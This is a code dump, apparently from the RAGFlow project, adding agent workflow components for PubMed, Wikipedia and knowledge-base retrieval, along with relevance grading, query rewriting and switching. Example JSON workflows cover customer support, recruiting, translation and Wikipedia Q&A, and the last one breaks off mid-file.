# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from Bio import Entrez
import pandas as pd
import xml.etree.ElementTree as ET
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class PubMedParam(ComponentParamBase):
"""
Define the PubMed component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 5
self.email = "A.N.Other@example.com"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
class PubMed(ComponentBase, ABC):
component_name = "PubMed"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return PubMed.be_output("")
try:
Entrez.email = self._param.email
pubmedids = Entrez.read(Entrez.esearch(db='pubmed', retmax=self._param.top_n, term=ans))['IdList']
pubmedcnt = ET.fromstring(
Entrez.efetch(db='pubmed', id=",".join(pubmedids), retmode="xml").read().decode("utf-8"))
pubmed_res = [{"content": 'Title:' + child.find("MedlineCitation").find("Article").find(
"ArticleTitle").text + '\nUrl:<a href=" https://pubmed.ncbi.nlm.nih.gov/' + child.find(
"MedlineCitation").find("PMID").text + '">' + '</a>\n' + 'Abstract:' + child.find(
"MedlineCitation").find("Article").find("Abstract").find("AbstractText").text} for child in
pubmedcnt.findall("PubmedArticle")]
except Exception as e:
return PubMed.be_output("**ERROR**: " + str(e))
if not pubmed_res:
return PubMed.be_output("")
df = pd.DataFrame(pubmed_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

View File

@ -0,0 +1,80 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
from rag.utils import num_tokens_from_string, encoder
class RelevantParam(GenerateParam):
"""
Define the Relevant component parameters.
"""
def __init__(self):
super().__init__()
self.prompt = ""
self.yes = ""
self.no = ""
def check(self):
super().check()
self.check_empty(self.yes, "[Relevant] 'Yes'")
self.check_empty(self.no, "[Relevant] 'No'")
def get_prompt(self):
self.prompt = """
You are a grader assessing relevance of a retrieved document to a user question.
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
Give a binary score 'yes' or 'no' score to indicate whether the document is relevant to the question.
No other words needed except 'yes' or 'no'.
"""
return self.prompt
class Relevant(Generate, ABC):
component_name = "Relevant"
def _run(self, history, **kwargs):
q = ""
for r, c in self._canvas.history[::-1]:
if r == "user":
q = c
break
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Relevant.be_output(self._param.no)
ans = "Documents: \n" + ans
ans = f"Question: {q}\n" + ans
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
if num_tokens_from_string(ans) >= chat_mdl.max_length - 4:
ans = encoder.decode(encoder.encode(ans)[:chat_mdl.max_length - 4])
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": ans}],
self._param.gen_conf())
print(ans, ":::::::::::::::::::::::::::::::::")
if ans.lower().find("yes") >= 0:
return Relevant.be_output(self._param.yes)
if ans.lower().find("no") >= 0:
return Relevant.be_output(self._param.no)
assert False, f"Relevant component got: {ans}"

View File

@ -0,0 +1,88 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api.settings import retrievaler
from agent.component.base import ComponentBase, ComponentParamBase
class RetrievalParam(ComponentParamBase):
"""
Define the Retrieval component parameters.
"""
def __init__(self):
super().__init__()
self.similarity_threshold = 0.2
self.keywords_similarity_weight = 0.5
self.top_n = 8
self.top_k = 1024
self.kb_ids = []
self.rerank_id = ""
self.empty_response = ""
def check(self):
self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keywords similarity weight")
self.check_positive_number(self.top_n, "[Retrieval] Top N")
self.check_empty(self.kb_ids, "[Retrieval] Knowledge bases")
class Retrieval(ComponentBase, ABC):
component_name = "Retrieval"
def _run(self, history, **kwargs):
query = []
for role, cnt in history[::-1][:self._param.message_history_window_size]:
if role != "user":continue
query.append(cnt)
query = "\n".join(query)
kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
if not kbs:
raise ValueError("Can't find knowledgebases by {}".format(self._param.kb_ids))
embd_nms = list(set([kb.embd_id for kb in kbs]))
assert len(embd_nms) == 1, "Knowledge bases use different embedding models."
embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])
self._canvas.set_embedding_model(embd_nms[0])
rerank_mdl = None
if self._param.rerank_id:
rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)
kbinfos = retrievaler.retrieval(query, embd_mdl, kbs[0].tenant_id, self._param.kb_ids,
1, self._param.top_n,
self._param.similarity_threshold, 1 - self._param.keywords_similarity_weight,
aggs=False, rerank_mdl=rerank_mdl)
if not kbinfos["chunks"]:
df = Retrieval.be_output(self._param.empty_response)
df["empty_response"] = True
return df
df = pd.DataFrame(kbinfos["chunks"])
df["content"] = df["content_with_weight"]
del df["content_with_weight"]
print(">>>>>>>>>>>>>>>>>>>>>>>>>>\n", query, df)
return df

View File

@ -0,0 +1,72 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
from api.db import LLMType
from api.db.services.llm_service import LLMBundle
from agent.component import GenerateParam, Generate
class RewriteQuestionParam(GenerateParam):
"""
Define the QuestionRewrite component parameters.
"""
def __init__(self):
super().__init__()
self.temperature = 0.9
self.prompt = ""
self.loop = 1
def check(self):
super().check()
def get_prompt(self):
self.prompt = """
You are an expert at query expansion to generate a paraphrasing of a question.
I can't retrieval relevant information from the knowledge base by using user's question directly.
You need to expand or paraphrase user's question by multiple ways such as using synonyms words/phrase,
writing the abbreviation in its entirety, adding some extra descriptions or explanations,
changing the way of expression, translating the original question into another language (English/Chinese), etc.
And return 5 versions of question and one is from translation.
Just list the question. No other words are needed.
"""
return self.prompt
class RewriteQuestion(Generate, ABC):
component_name = "RewriteQuestion"
def _run(self, history, **kwargs):
if not hasattr(self, "_loop"):
setattr(self, "_loop", 0)
if self._loop >= self._param.loop:
self._loop = 0
raise Exception("Maximum loop time exceeds. Can't find relevant information.")
self._loop += 1
q = "Question: "
for r, c in self._canvas.history[::-1]:
if r == "user":
q += c
break
chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
ans = chat_mdl.chat(self._param.get_prompt(), [{"role": "user", "content": q}],
self._param.gen_conf())
print(ans, ":::::::::::::::::::::::::::::::::")
return RewriteQuestion.be_output(ans)

77
agent/component/switch.py Normal file
View File

@ -0,0 +1,77 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABC
import pandas as pd
from agent.component.base import ComponentBase, ComponentParamBase
class SwitchParam(ComponentParamBase):
"""
Define the Switch component parameters.
"""
def __init__(self):
super().__init__()
"""
{
"cpn_id": "categorize:0",
"not": False,
"operator": "gt/gte/lt/lte/eq/in",
"value": "",
"to": ""
}
"""
self.conditions = []
self.default = ""
def check(self):
self.check_empty(self.conditions, "[Switch] conditions")
self.check_empty(self.default, "[Switch] Default path")
for cond in self.conditions:
if not cond["to"]: raise ValueError(f"[Switch] 'To' can not be empty!")
def operators(self, field, op, value):
if op == "gt":
return float(field) > float(value)
if op == "gte":
return float(field) >= float(value)
if op == "lt":
return float(field) < float(value)
if op == "lte":
return float(field) <= float(value)
if op == "eq":
return str(field) == str(value)
if op == "in":
return str(field).find(str(value)) >= 0
return False
class Switch(ComponentBase, ABC):
component_name = "Switch"
def _run(self, history, **kwargs):
for cond in self._param.conditions:
input = self._canvas.get_component(cond["cpn_id"])["obj"].output()[1]
if self._param.operators(input.iloc[0, 0], cond["operator"], cond["value"]):
if not cond["not"]:
return pd.DataFrame([{"content": cond["to"]}])
return pd.DataFrame([{"content": self._param.default}])

View File

@ -0,0 +1,69 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import random
from abc import ABC
from functools import partial
import wikipedia
import pandas as pd
from agent.settings import DEBUG
from agent.component.base import ComponentBase, ComponentParamBase
class WikipediaParam(ComponentParamBase):
"""
Define the Wikipedia component parameters.
"""
def __init__(self):
super().__init__()
self.top_n = 10
self.language = "en"
def check(self):
self.check_positive_integer(self.top_n, "Top N")
self.check_valid_value(self.language, "Wikipedia languages",
['af', 'pl', 'ar', 'ast', 'az', 'bg', 'nan', 'bn', 'be', 'ca', 'cs', 'cy', 'da', 'de',
'et', 'el', 'en', 'es', 'eo', 'eu', 'fa', 'fr', 'gl', 'ko', 'hy', 'hi', 'hr', 'id',
'it', 'he', 'ka', 'lld', 'la', 'lv', 'lt', 'hu', 'mk', 'arz', 'ms', 'min', 'my', 'nl',
'ja', 'nb', 'nn', 'ce', 'uz', 'pt', 'kk', 'ro', 'ru', 'ceb', 'sk', 'sl', 'sr', 'sh',
'fi', 'sv', 'ta', 'tt', 'th', 'tg', 'azb', 'tr', 'uk', 'ur', 'vi', 'war', 'zh', 'yue'])
class Wikipedia(ComponentBase, ABC):
component_name = "Wikipedia"
def _run(self, history, **kwargs):
ans = self.get_input()
ans = " - ".join(ans["content"]) if "content" in ans else ""
if not ans:
return Wikipedia.be_output("")
try:
wiki_res = []
wikipedia.set_lang(self._param.language)
wiki_engine = wikipedia
for wiki_key in wiki_engine.search(ans, results=self._param.top_n):
page = wiki_engine.page(title=wiki_key, auto_suggest=False)
wiki_res.append({"content": '<a href="' + page.url + '">' + page.title + '</a> ' + page.summary})
except Exception as e:
return Wikipedia.be_output("**ERROR**: " + str(e))
if not wiki_res:
return Wikipedia.be_output("")
df = pd.DataFrame(wiki_res)
if DEBUG: print(df, ":::::::::::::::::::::::::::::::::")
return df

34
agent/settings.py Normal file
View File

@ -0,0 +1,34 @@
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Logger
import os
from api.utils.file_utils import get_project_base_directory
from api.utils.log_utils import LoggerFactory, getLogger
DEBUG = 0
LoggerFactory.set_directory(
os.path.join(
get_project_base_directory(),
"logs",
"flow"))
# {CRITICAL: 50, FATAL:50, ERROR:40, WARNING:30, WARN:30, INFO:20, DEBUG:10, NOTSET:0}
LoggerFactory.LEVEL = 30
flow_logger = getLogger("flow")
database_logger = getLogger("database")
FLOAT_ZERO = 1e-8
PARAM_MAXDEPTH = 5

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

48
agent/test/client.py Normal file
View File

@ -0,0 +1,48 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import os
from functools import partial
from agent.canvas import Canvas
from agent.settings import DEBUG
if __name__ == '__main__':
parser = argparse.ArgumentParser()
dsl_default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dsl_examples",
"retrieval_and_generate.json",
)
parser.add_argument('-s', '--dsl', default=dsl_default_path, help="input dsl", action='store', required=True)
parser.add_argument('-t', '--tenant_id', default=False, help="Tenant ID", action='store', required=True)
parser.add_argument('-m', '--stream', default=False, help="Stream output", action='store_true', required=False)
args = parser.parse_args()
canvas = Canvas(open(args.dsl, "r").read(), args.tenant_id)
while True:
ans = canvas.run(stream=args.stream)
print("==================== Bot =====================\n> ", end='')
if args.stream and isinstance(ans, partial):
cont = ""
for an in ans():
print(an["content"][len(cont):], end='', flush=True)
cont = an["content"]
else:
print(ans["content"])
if DEBUG: print(canvas.path)
question = input("\n==================== User =====================\n> ")
canvas.add_user_input(question)

View File

@ -0,0 +1,45 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"product_related": {
"description": "The question is about the product usage, appearance and how it works.",
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?"
},
"others": {
"description": "The question is not about the product usage, appearance and how it works.",
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?"
}
}
}
},
"downstream": [],
"upstream": ["answer:0"]
}
},
"history": [],
"path": [],
"answer": []
}

View File

@ -0,0 +1,157 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi! How can I help you?"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin", "generate:0", "generate:casual", "generate:answer", "generate:complain", "generate:ask_contact", "message:get_contact"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"product_related": {
"description": "The question is about the product usage, appearance and how it works.",
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
"to": "retrieval:0"
},
"casual": {
"description": "The question is not about the product usage, appearance and how it works. Just casual chat.",
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
"to": "generate:casual"
},
"complain": {
"description": "Complain even curse about the product or service you provide. But the comment is not specific enough.",
"examples": "How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
"to": "generate:complain"
},
"answer": {
"description": "This answer provide a specific contact information, like e-mail, phone number, wechat number, line number, twitter, discord, etc,.",
"examples": "My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
"to": "message:get_contact"
}
},
"message_history_window_size": 8
}
},
"downstream": ["retrieval:0", "generate:casual", "generate:complain", "message:get_contact"],
"upstream": ["answer:0"]
},
"generate:casual": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a customer support. But the customer wants to have a casual chat with you instead of consulting about the product. Be nice, funny, enthusiasm and concern.",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
},
"generate:complain": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a customer support. the Customers complain even curse about the products but not specific enough. You need to ask him/her what's the specific problem with the product. Be nice, patient and concern to soothe your customers emotions at first place.",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["relevant:0"],
"upstream": ["categorize:0"]
},
"relevant:0": {
"obj": {
"component_name": "Relevant",
"params": {
"llm_id": "deepseek-chat",
"temperature": 0.02,
"yes": "generate:answer",
"no": "generate:ask_contact"
}
},
"downstream": ["generate:answer", "generate:ask_contact"],
"upstream": ["retrieval:0"]
},
"generate:answer": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
"temperature": 0.02
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"generate:ask_contact": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are a customer support. But you can't answer to customers' question. You need to request their contact like E-mail, phone number, Wechat number, LINE number, twitter, discord, etc,. Product experts will contact them later. Please do not ask the same question twice.",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:0"],
"upstream": ["relevant:0"]
},
"message:get_contact": {
"obj":{
"component_name": "Message",
"params": {
"messages": [
"Okay, I've already write this down. What else I can do for you?",
"Get it. What else I can do for you?",
"Thanks for your trust! Our expert will contact ASAP. So, anything else I can do for you?",
"Thanks! So, anything else I can do for you?"
]
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
}
},
"history": [],
"messages": [],
"path": [],
"reference": [],
"answer": []
}

View File

@ -0,0 +1,210 @@
{
"components": {
"begin": {
"obj": {
"component_name": "Begin",
"params": {
"prologue": "您好我是AGI方向的猎头了解到您是这方面的大佬然后冒昧的就联系到您。这边有个机会想和您分享RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:0"],
"upstream": ["begin", "message:reject"]
},
"categorize:0": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"about_job": {
"description": "该问题关于职位本身或公司的信息。",
"examples": "什么岗位?\n汇报对象是谁?\n公司多少人\n公司有啥产品\n具体工作内容是啥\n地点哪里\n双休吗",
"to": "retrieval:0"
},
"casual": {
"description": "该问题不关于职位本身或公司的信息,属于闲聊。",
"examples": "你好\n好久不见\n你男的女的\n你是猴子派来的救兵吗\n上午开会了?\n你叫啥\n最近市场如何?生意好做吗?",
"to": "generate:casual"
},
"interested": {
"description": "该回答表示他对于该职位感兴趣。",
"examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
"to": "message:introduction"
},
"answer": {
"description": "该回答表示他对于该职位不感兴趣,或感觉受到骚扰。",
"examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
"to": "message:reject"
}
}
}
},
"downstream": [
"message:introduction",
"generate:casual",
"message:reject",
"retrieval:0"
],
"upstream": ["answer:0"]
},
"message:introduction": {
"obj": {
"component_name": "Message",
"params": {
"messages": [
"我简单介绍以下:\nRAGFlow 是一款基于深度文档理解构建的开源 RAGRetrieval-Augmented Generation引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程结合大语言模型LLM针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的"
]
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:0"]
},
"answer:1": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["categorize:1"],
"upstream": [
"message:introduction",
"generate:aboutJob",
"generate:casual",
"generate:get_wechat",
"generate:nowechat"
]
},
"categorize:1": {
"obj": {
"component_name": "Categorize",
"params": {
"llm_id": "deepseek-chat",
"category_description": {
"about_job": {
"description": "该问题关于职位本身或公司的信息。",
"examples": "什么岗位?\n汇报对象是谁?\n公司多少人\n公司有啥产品\n具体工作内容是啥\n地点哪里\n双休吗",
"to": "retrieval:0"
},
"casual": {
"description": "该问题不关于职位本身或公司的信息,属于闲聊。",
"examples": "你好\n好久不见\n你男的女的\n你是猴子派来的救兵吗\n上午开会了?\n你叫啥\n最近市场如何?生意好做吗?",
"to": "generate:casual"
},
"wechat": {
"description": "该回答表示他愿意加微信,或者已经报了微信号。",
"examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
"to": "generate:get_wechat"
},
"giveup": {
"description": "该回答表示他不愿意加微信。",
"examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
"to": "generate:nowechat"
}
},
"message_history_window_size": 8
}
},
"downstream": [
"retrieval:0",
"generate:casual",
"generate:get_wechat",
"generate:nowechat"
],
"upstream": ["answer:1"]
},
"generate:casual": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "你是AGI方向的猎头现在候选人的聊了和职位无关的话题请耐心的回应候选人并将话题往该AGI的职位上带最好能要到候选人微信号以便后面保持联系。",
"temperature": 0.9,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:0", "categorize:1"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["generate:aboutJob"],
"upstream": ["categorize:0", "categorize:1"]
},
"generate:aboutJob": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "你是AGI方向的猎头候选人问了有关职位或公司的问题你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号\n - 方便加一下微信吗我把JD发您看看\n - 微信号多少我把详细职位JD发您\n 职位信息如下:\n {input}\n 职位信息如上。",
"temperature": 0.02
}
},
"downstream": ["answer:1"],
"upstream": ["retrieval:0"]
},
"generate:get_wechat": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "你是AGI方向的猎头候选人表示不反感加微信如果对方已经报了微信号表示感谢和信任并表示马上会加上如果没有则问对方微信号多少。你的微信号是weixin_kevinE-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
"temperature": 0.1,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:1"]
},
"generate:nowechat": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "你是AGI方向的猎头当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人表示对于保护隐私信息给予理解也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevinE-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
"temperature": 0.1,
"message_history_window_size": 12,
"cite": false
}
},
"downstream": ["answer:1"],
"upstream": ["categorize:1"]
},
"message:reject": {
"obj": {
"component_name": "Message",
"params": {
"messages": [
"好的,祝您生活愉快,工作顺利。",
"哦,好的,感谢您宝贵的时间!"
]
}
},
"downstream": ["answer:0"],
"upstream": ["categorize:0"]
}
},
"history": [],
"messages": [],
"path": [],
"reference": [],
"answer": []
}

View File

@ -0,0 +1,39 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["generate:0"],
"upstream": ["begin", "generate:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"temperature": 0.5
}
},
"downstream": ["answer:0"],
"upstream": ["answer:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}

View File

@ -0,0 +1,39 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["generate:0"],
"upstream": ["begin", "generate:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
"temperature": 0.5
}
},
"downstream": ["answer:0"],
"upstream": ["answer:0"]
}
},
"history": [],
"messages": [],
"reference": {},
"path": [],
"answer": []
}

View File

@ -0,0 +1,62 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["keyword:0"],
"upstream": ["begin"]
},
"keyword:0": {
"obj": {
"component_name": "KeywordExtract",
"params": {
"llm_id": "deepseek-chat",
"prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
"temperature": 0.2,
"top_n": 1
}
},
"downstream": ["wikipedia:0"],
"upstream": ["answer:0"]
},
"wikipedia:0": {
"obj":{
"component_name": "Wikipedia",
"params": {
"top_n": 10
}
},
"downstream": ["generate:0"],
"upstream": ["keyword:0"]
},
"generate:1": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
"prompt": "You are an intelligent assistant. Please answer the question based on content from Wikipedia. When the answer from Wikipedia is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Wikipedia is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Wikipedia!\". Answers need to consider chat history.\n The content of Wikipedia is as follows:\n {input}\n The above is the content of Wikipedia.",
"temperature": 0.2
}
},
"downstream": ["answer:0"],
"upstream": ["wikipedia:0"]
}
},
"history": [],
"path": [],
"messages": [],
"reference": {},
"answer": []
}

View File

@ -0,0 +1,54 @@
{
"components": {
"begin": {
"obj":{
"component_name": "Begin",
"params": {
"prologue": "Hi there!"
}
},
"downstream": ["answer:0"],
"upstream": []
},
"answer:0": {
"obj": {
"component_name": "Answer",
"params": {}
},
"downstream": ["retrieval:0"],
"upstream": ["begin", "generate:0"]
},
"retrieval:0": {
"obj": {
"component_name": "Retrieval",
"params": {
"similarity_threshold": 0.2,
"keywords_similarity_weight": 0.3,
"top_n": 6,
"top_k": 1024,
"rerank_id": "BAAI/bge-reranker-v2-m3",
"kb_ids": ["869a236818b811ef91dffa163e197198"]
}
},
"downstream": ["generate:0"],
"upstream": ["answer:0"]
},
"generate:0": {
"obj": {
"component_name": "Generate",
"params": {
"llm_id": "deepseek-chat",
